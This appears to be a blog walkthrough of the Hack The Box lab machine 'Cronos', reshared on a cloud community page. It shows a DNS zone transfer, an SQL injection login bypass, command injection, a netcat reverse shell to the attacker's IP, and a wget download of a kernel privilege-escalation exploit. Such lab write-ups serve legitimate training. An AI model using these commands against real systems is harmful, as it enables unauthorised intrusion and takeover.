专栏首页madMenCronos -- hack the box

Cronos -- hack the box

Introduction

Target machine: 10.10.10.13(OS: linux)

Kali linux: 10.10.16.44

Enumeration

Firstly, detect the open ports:

nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.13

3 ports is open, detect the detailed services:

namp -sV -sC -p22.53.80 -Pn -oA services 10.10.10.13

So we can conduct the relation of ports and services as following:

port

service

53

DNS

22

ssh

80

http

Exploitation

http

As the target machine provides http service, try to access http://10.10.10.13

Default apache web page, nothing new. So try to brute force http://10.10.10.13/ with dirbuster. After brute force for a period time, we have not found anything new.

DNS

As the target machine owns DNS service. It is common to check zone transfer with dig. As we can have a guess of the dns domain of cronos.htb. So zone transfer can be checked by:

dig axfr @10.10.10.13 cronos.htb

An interestring domain name admin.cronos.htb is found. So add an entry into /etc/hosts:

10.10.10.13    admin.cronos.htb

Try to access admin.cronos.htb in the browser, a login web page is displayed. Yep, it is what we want. It seems that the login is quite simple. Try to login with sql injection with the username of admin' or '1' = '1, the password can be anything.

Magic! We are in. It seems that it is a network tool. However, it seems that it has exposed the ability to execute command remotely. Have a test of 8888&whoami:

The result is www-data. Obviously, the command can executed properly. Now try to reverse the shell. Try to listen to port 1234 by nc in our kali:

nc -lvnp 1234

Then use the bash reverse shell command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.44 1234 >/tmp/f

Wait for serveral seconds, shell is return. Wonderful!

Try to obtain a tty terminal:

python -c "import pty;pty.spawn('/bin/sh')"

Obviously, the user role can be obtained. Go the home folder and ls, then go into the user folder to get user.txt.

Privilege escalation

It's time to get the root role. See the kernel of the target machine:

uname -a

Google linux kernel privilege escalation, find a payload

Start a http server to provide the payload, name it as exploit.c:

pythoon -m SimpleHTTPServer 80

There are serveal ways to provide http file services, including: php, apache, python, etc. Pyhton is quite convenient. Then download the exploit.c in the target machine:

wget http://10.10.16.22/exploit.c

Then try to compile it with gcc. Opps, gcc seems has not been installed in the target machine. In general, linux will install gcc. Whatever, compile the exploit.c in kali:

gcc exploit.c -o exploit

Remember to download the file from a folder with permission, just like /tmp:

cd /tmpwget http://10.10.16.44/exploit

Make sure to have execution perssion by:

chmod +x exploit

Just execute it by ./exploit. Wow, now see whoami.

Conclusion

The target machine is quite straitforward. The basic point is the zone transfer of DNS exploit. And other steps is not difficult with basic knowledges including: sql injection, reverse shell, etc.

本文分享自微信公众号 - madMen(mad_coder),作者:madneal

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-03-15

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Holiday -- hack the box

    Holiday is an insane box officially. It's really difficult to get the user permi...

    madneal
  • Nibbles - Hack the box

    Target: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44

    madneal
  • Haystack - hack the box

    HayStack is an easy box in hack the box. But it does isn't easy at all. It's ann...

    madneal
  • Python中的passed by assignment与.NET中的passing by reference、passing by value

    Remember that arguments are passed by assignment in Python. Since assignment jus...

    雪飞鸿
  • Redis超详细总结

    在90年代,一个网站的访问量一般都不大,用单个数据库完全可以轻松应付。在那个时候,更多的都是静态网页,动态交互类型的网站不多。

    说故事的五公子
  • ROS(indigo) 安装和使用更新版本的Gazebo----3,4,5,6,7 附:中国机器人大赛中型组仿真比赛说明

    那么配套安装的是Gazebo2,如何在ROS(indigo)中使用更新版本的Gazebo呢?

    zhangrelay
  • redis配置详解(中英文)

    V2.8.21: (中英字幕同步) # Redis configuration file example #* Redis 配置文件例子 # Note on...

    三丰SanFeng
  • redis的安装与使用

     redis是当前比较热门的NOSQL系统之一,它是一个key-value存储系统。和Memcached类似,但很大程度补偿了memcached的不足,它支持存...

    人生不如戏
  • Android跨进程通信IPC之5——Binder的三大接口

    本片文章的主要目的是让大家对Binder有个初步的了解,既然是初步了解,肯定所是以源码上的注释为主,让大家对Binder有一个更直观的认识。PS:大部分注释我是...

    隔壁老李头
  • Spring AOP 失效的真正元凶

    Understanding AOP proxies Spring AOP is proxy-based. It is vitally important tha...

    Java高级架构

扫码关注云+社区

领取腾讯云代金券